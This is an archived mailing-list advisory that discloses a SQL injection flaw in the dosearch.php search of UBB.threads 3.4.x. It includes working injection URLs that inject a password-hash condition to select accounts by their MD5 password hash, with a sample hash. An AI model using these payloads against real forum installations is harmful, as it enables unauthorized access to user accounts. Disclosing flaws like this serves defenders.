lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006b01c4b7ad$7ee3f3b0$0a01a8c0@remote>
From: florianrock at web.de (Florian Rock)
Subject: SQL Injection in UBB.threads 3.4.x

Product:
========
UBB.threads

Vendor:
=======
UBBCentral (http://www.ubbcentral.com/)

Versions:
=========
I tested it successfull on 3.4.x
At Version 3.5 you need to be logged in to perform a search. I didnt tested 
this version.

Problem:
========
Sql-Injection in dosearch.php
dosearch.php?Name=' OR U_Password='PWINMD5

Impact:
=======
A remote user can inject SQL commands

Example:
========
db5c82346d770f48bdd8929094c0c695 (ubbpass)

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
OR
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
-> selects a user who got "ubbpass" as password.

Greets fly out to:
==================
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,
peti, danjo, milch_trinker, hecky, and all i forgot

Greets
Florian Rock aka Remoter 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ